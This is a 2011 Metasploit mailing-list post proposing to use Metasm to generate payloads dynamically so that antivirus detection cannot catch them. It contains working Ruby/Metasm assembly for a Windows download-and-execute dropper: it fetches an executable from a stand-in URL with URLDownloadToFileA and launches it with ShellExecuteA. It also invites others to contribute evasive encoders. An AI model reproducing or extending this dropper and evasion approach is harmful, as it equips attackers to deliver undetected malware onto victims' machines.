[framework] Payload AV evasion thoughts...

John B johnb.electric at gmail.com
Mon Apr 18 08:09:17 CDT 2011

I brought up this idea a few months ago on the mailing list, but there might
be some more interest in it now.  The idea is to use Metasm to dynamically
create payloads instead of using the base template.  I've been able to
produce a portable (XP-7) message box payload that is assembled on the fly,
but I don't have enough ASM experience to make it unique, meaning that if two
people use the same title and msg string then the payloads would be
identical. I've seen some work in the framework with Metasm-created encoders
for MIPS <https://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/encoders/mipsbe/longxor.rb>
and, outside the framework, a smiley
encoder <http://www.cr0.org/misc/smile.rb> for IM exploits.

Here's an example of what a basic download-and-execute payload would look like
(example only, probably not the most AV-evasive way):


require 'metasm'

# Assemble a small PE32 from inline Ia32 source; the heredoc must be
# terminated by EOS, and the import table is built from the .import lines.
pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS
; URLDownloadToFileA(NULL, URL, PATH, 0, NULL); stdcall, args pushed right to left
push 0
push 0
push PATH
push URL
push 0
call download

; ShellExecuteA(NULL, CMD, PATH, NULL, NULL, 0)
push 0
push 0
push 0
push PATH
push CMD
push 0
call execute

; .import 'dll' ExportName local_label  (local_label is what 'call' uses)
.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download

; NUL-terminated strings referenced above
URL  db "http://someaddress.com/download/hellow.exe", 0
PATH db "c:/users/john/testd.exe", 0
CMD  db "open", 0
EOS

# Write the assembled PE to disk
pe.encode_file 'down.exe'

///////end code

Combine that with code to make it portable across all systems, then add
an encoding stub, and we can create unique payloads every time without
the need for templates (with the assumption that the templates are the
main way of detecting payloads).

I will continue to work on some full examples but anyone with asm
experience who could create some dynamic encoders with Metasm would
really be helpful.
